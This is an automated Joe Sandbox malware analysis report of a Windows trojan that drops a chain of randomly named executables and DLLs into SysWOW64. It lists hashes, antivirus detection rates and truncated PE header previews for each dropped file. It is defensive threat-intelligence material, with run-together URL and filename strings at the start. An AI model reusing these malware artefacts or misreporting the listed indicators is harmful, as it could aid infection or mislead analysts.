                      http://tat-neftbank.ru/kkq.phph879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exefalse
                        		unknown
                        http://www.oracle.com/education/oln.h879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.drfalseunknown
                        http://oracle.com/contractsh879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.drfalse
                          		unknown

                          World Map of Contacted IPs

                          No contacted IP infos

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1545775
                          Start date and time:2024-10-31 00:58:05 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 5s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:40
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:h879iieoae.exe
                          renamed because original name is a hash value
                          Original Sample Name:55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@80/81@0/0
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 90
                          • Number of non-executed functions: 279
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Windows\SysWOW64\Accicdme.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Ojacofgb.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885251662124886
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU108BB+BDq9J5SV3DY:CSVVEPozmB70B+FqX5S1D
                          MD5:01BACC1A6C373F362354B368FE25582F
                          SHA1:B9D8D4695D14DD6B6F819897E6B558FAA064334B
                          SHA-256:99C0889F1A5B4A1DB587CEF07568E4CF336027161C55EC20147A7B31F29AF391
                          SHA-512:BBEAFE35B908C06F7FE7CA17F8BCC7EA6B9339EA07273398726E38B60090AD3D53940B15F51C584258542B2A399537D6B60039E1B920DBCDA18FE24434664F48
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 90%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ahhhnd32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Cnjaioih.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.886072655616197
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10hDB+BDq9J5SV3DY:CSVVEPozmB73B+FqX5S1D
                          MD5:5C77B6D6FE11323575BE1C051AD8E3AC
                          SHA1:E466654A2AEBFAD4432CAC84AA92A2F2F3EEBC1F
                          SHA-256:8CBE454390BA6A4A0AB116F3B227D5D73733FD35C8F0581987AD4BD781E490A4
                          SHA-512:F57CE28FE451EE614CBD9489082FC149ACF2CF1A8C6694FC308949681EEDF963670B33BEAEBC0C6AD0C78E1F0B7F53D75A28488D442E8470098FC0E1BD539667
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 96%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ajikgq32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Fkogfkdj.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8859601858599824
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10VB+BDq9J5SV3DY:CSVVEPozmB7nB+FqX5S1D
                          MD5:4066501E819BB165774CE40327C68337
                          SHA1:09A95BB7745B1BF3F6A6DC21C9B5F6393ED10AA2
                          SHA-256:FED582E72F459F76C81527E41DE9396ACCD2974F7F0D04EFBD11DAD1FB4CB11F
                          SHA-512:D23F4534AD3341F868B996F519111C9C513070E143F43B096B903B062EEB21854392CA37287DFF93C261DCA9B8C18A0D7A2494B23A1F5F2D792747AD80F073FC
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ajkolbad.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Qgcpihjl.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.998933945479664
                          Encrypted:false
                          SSDEEP:3072:RBj8+dFnx0uD5bkAKuCREXdXNKT1ntPG9poDrFDHZtOgl:RBgchx0uD5bkAKFCN9Otopg5tTl
                          MD5:9A076EA5029217C545E15BC92444072D
                          SHA1:25CD1D94EA1CF47E3303B707899624F4407A4635
                          SHA-256:ECD6C51954210CBFE65B7B60F7CCA9BB2C937A4FE2EDA165A2EEDEBC00B6D6A4
                          SHA-512:B9DC7B511E10F366762616DA66505D59BBF2037E42CD7B0FC52DCF65D0AE574AFB09890976579F43933EC48AA8FAD89A1600DB4470EFAEE4FBDED0ECBAC9A17D
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Akghbg32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Plgflqpn.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8859769310145094
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10lB+BDq9J5SV3DY:CSVVEPozmB7HB+FqX5S1D
                          MD5:FF1180CEBD10F8C96F7D1AE9AF61A2D0
                          SHA1:854B39782CB0C43E36B5AECF2A3D9781B4C79C3C
                          SHA-256:18AC5AAA58D71E07E73995A8E7BEE7757062E090CE0AFF3BFA54F627E4EEBD2B
                          SHA-512:A653F082F7F951FC81F8A8325B533221B8751B120224A287AFFC3F522B7C9FBF07191597A98A683E6443E0477F9AE62BEC4853DF5814EB6385609DBA7EC6B538
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 90%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Baagdk32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bgibkegc.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.028616360071742
                          Encrypted:false
                          SSDEEP:3072:cUhgDWZpgXCREXdXNKT1ntPG9poDrFDHZtOgl:nh7ZpgyCN9Otopg5tTl
                          MD5:1F4BBF60BA2126DD626006EB2F22CA9D
                          SHA1:D437D1870F23E7F8E896DF9A30A8FC5A1A313D1D
                          SHA-256:A676676E05DE3E6CF5E7097FF786E2E4641B68DC73AD0B609C8555E5E5460AB3
                          SHA-512:77FF202F3340A0498686DA7F91E31ECC8655E511124645262AD19A71624F522D0EAE4799CA3970065E340A02356061DD840127AD5C9A6D3D347F710CADF426A9
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bdlhdkdf.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Odekfoij.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8860557329548437
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10uB+BDq9J5SV3DY:CSVVEPozmB7sB+FqX5S1D
                          MD5:5029F68B8C3F9CCB8EE44619AAEB956D
                          SHA1:FDAC430DD67CE6111981B0AE76FC7E49C103C99F
                          SHA-256:6E0C87BD3F531A471096B0D6401A742D309ECD8D8D15980627BB1A783E2FE722
                          SHA-512:CEC0A65BEA6CCB598A9C2DC98434F75DEED5C156D8550912F4A1C67E47750E74E351F733CBB687A507560E471B857016A18CA8BBCEC4B621E8888C319EEFE8BE
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Bgamkfnl.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bmlhnnne.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.031645249329655
                          Encrypted:false
                          SSDEEP:3072:G8x+/Oj0yCREXdXNKT1ntPG9poDrFDHZtOgl:xzQRCN9Otopg5tTl
                          MD5:2DAF6E68C4322E5ABD5103F013110A0D
                          SHA1:B006701EF3F12B2469CF00BF27320EAB6447C4B2
                          SHA-256:F5995BDAA80E76C7FE77EF22C4932F70EABF9095139768C1F38DF759AD7E315D
                          SHA-512:9D01C2BB1B25CCDA6DFE48D5D88B6B07A0BB549A1EA4FEE36614322E4E51ED3858FCB990E2D93CB3A29248CCE6ABDE66B10B85E595578883C4518A827CF46FC1
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bgibkegc.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bnpnbp32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.028279935735276
                          Encrypted:false
                          SSDEEP:3072:FMk3dmGBMf38a9fogbqvm6oCREXdXNKT1ntPG9poDrFDHZtOgl:/UGB6fotm6nCN9Otopg5tTl
                          MD5:0DBB530A0BE511F3DC794C1024460A99
                          SHA1:260A27D85203A564F3E6C416F0EEEDCEC4F3FBE9
                          SHA-256:C979B99EDCDA8CD54A9863DE3A53946D8C7C51513EE7BA338B92366B9979D3A2
                          SHA-512:084F0F6BADC8E7A76661D43EF2F2CC3BEDDF2F602F223EB45B5A4F7BA6C1953B38D184BAA03E4B98411FE9AD3DB3036E056EA23B71E83B617CC4EEBA9D497C06
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bmlhnnne.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Ajkolbad.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.971263561242074
                          Encrypted:false
                          SSDEEP:3072:e8oYMpMNxiEmGcCREXdXNKT1ntPG9poDrFDHZtOgl:RoINUEmGTCN9Otopg5tTl
                          MD5:A98CEA1775884370D8699936D1B8E227
                          SHA1:4FE88A32467399CFF48DEA1FD1827B2CC42BE7BA
                          SHA-256:91D7187987D94F1C8404FBD31176B64C44EF91ED6D5A31E7E0FBFC9151679B24
                          SHA-512:A3670D820B10B0240A0C7643BF1544A47055A9B260F9394AB87BADAA802C8407D2A4FEB34AE8D5DB632C270130B035B60E17EAD8EE6A883A220FF2F95198105F
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bnnampcf.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bqjacldl.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.012397681056841
                          Encrypted:false
                          SSDEEP:3072:n1n88M8fLNrcCREXdXNKT1ntPG9poDrFDHZtOgl:1nFNrTCN9Otopg5tTl
                          MD5:F015A56D85709788B392A68459FEB024
                          SHA1:961EDCAE9789202FC47F8723130CF73FD5304C51
                          SHA-256:7AFE64740B01457391889E726604B486B03CEBFF904109A951DF4B37DB1AA540
                          SHA-512:F1025264BABC91E3E12D1038C91CFF49BC80258F1FC73BAA9A08B75AD8278183860C7C74599AFB73B3BB6E305E7E51ACBFBFBB55773DE76E109CF782D7657FB6
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bnpnbp32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bnnampcf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.978811833389095
                          Encrypted:false
                          SSDEEP:3072:W5F87rNJ8CREXdXNKT1ntPG9poDrFDHZtOgl:mW7rNJzCN9Otopg5tTl
                          MD5:7E024C6EF36928FEE4659AE588ED4D43
                          SHA1:895A214C29A42B71F0531101284175C7229C4E0D
                          SHA-256:C9E6C7C650398EBAB2BEBA2B6A48BCB9952691109AA4DF13BCA0F6B38470A617
                          SHA-512:90B719CC76B4DE00166E0870669D785CD9D3FC06DD930ACC6705D02ABCA53DCEC5663D2D54C47D6E23922F570C9830D8A239822363C90D46AE8F7AE7D7B566E0
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Bpghkh32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Nejhbi32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885666161338187
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10IB+BDq9J5SV3DY:CSVVEPozmB7mB+FqX5S1D
                          MD5:8985030965C63F5E6394490E239E7D2C
                          SHA1:B5F81BC16A683E0A225E443EA32BB3ECC06E9CD4
                          SHA-256:4A8731F9BB2ABCB72F476004A3FE11F364FB85EC62FB550A61D33EC7AEDE1366
                          SHA-512:17FB9A366359CB4EBEB01C39AA70906CE0127B457B96DB32956A262A11C16F7E1AA22E08D24ECDFCD642598CAE5CCCBBBDFC89FD8F4DE4D020B74E954DFDE7C9
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Bqjacldl.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Bgamkfnl.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.973651054789434
                          Encrypted:false
                          SSDEEP:3072:gp2Os8aenCREXdXNKT1ntPG9poDrFDHZtOgl:gMxLeCCN9Otopg5tTl
                          MD5:D92B3B389B0B969DCC1638C63737002A
                          SHA1:8923471E2B3BDB258EEF123E0739BA416DCADC0D
                          SHA-256:545C8C117FEBA5D9DD5D4465FF68BE9C6CB2550CCA15EE4F9C07097EE0C9EFAE
                          SHA-512:987F8629E0289B3367152E14B5970FDAFBE660C5154C2BE58E426B24EA7683DF17607B6A5664DAD6957E6AB5795ECBDBBFE093689D3D84B80AFF951EF12F69E2
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Camgpi32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Cnjaioih.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.0213579678318485
                          Encrypted:false
                          SSDEEP:3072:hMviBb/fRvfCREXdXNKT1ntPG9poDrFDHZtOgl:h8C/fxaCN9Otopg5tTl
                          MD5:AFB7FE6A2325DC169AF337B02D73EA13
                          SHA1:5D5B55D9DC2CD3472FAEABF5F22AAD16D0DC1AE3
                          SHA-256:3A730DAE92B7F36766E24FBA0BF7DF19DCBA517543A310BE97310FC76E18DAA7
                          SHA-512:FF614B1C8303AE7A23EB366E4EF7884A68C009D78CD20F650A08976E68389AD06DD510EFA456EA7A2C3A76BAD88B32FE3E9FBA04422F4E80FF394CC635635ABC
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Ccapffke.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Cfnpmb32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.016049589813998
                          Encrypted:false
                          SSDEEP:3072:16PuFKjaRrp8SzU9CREXdXNKT1ntPG9poDrFDHZtOgl:8Pj+RrprQICN9Otopg5tTl
                          MD5:713B5E4D81DBB20F5D48D2BC5501A007
                          SHA1:0B464262AA241BBBD388AE8B59AC1F5019BDA7EE
                          SHA-256:8CFB49CA56F34D91449B3FD9B151B5911E693F1377FAFF2302C97CC129D44110
                          SHA-512:14B4B78CB1CFCC07C9DB42DB41927A08922B2A9FB32F1772B0DD04D4D638AED0E0FCF4A605FAA5FB82CAF634DAEFA4E0721FC537012DD247FA193AD498DBE609
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Ceampi32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Ccapffke.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.0088055892708265
                          Encrypted:false
                          SSDEEP:3072:tMH6OIovHKJPcItYxFGhehLCREXdXNKT1ntPG9poDrFDHZtOgl:3JP3irGheh+CN9Otopg5tTl
                          MD5:7008B57588331F2C9C3672BB96521844
                          SHA1:D6FE8D16BD1A08F49AE051062C26E5128844B16A
                          SHA-256:DF760E40B57D6E4270C41DD80880A4AD8121D10839AB522A22D86AA9C4D3B4A6
                          SHA-512:E9758125840400DDA683B214C97F06007D2D33A517A7C5AFACEF972A441BEF4884ABD82CFFECA2C330F57EBDC8AAC1D961F977997688C598E4E0D7A14FFC84BE
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Cfnpmb32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Baagdk32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.993476163252334
                          Encrypted:false
                          SSDEEP:3072:Gn9vzlYqd7HqCREXdXNKT1ntPG9poDrFDHZtOgl:G9vBlHpCN9Otopg5tTl
                          MD5:3E45EB0DFCF7ACE28698143C3D650109
                          SHA1:F9CFCE90E04EFA165C4EAF241369E989C8554268
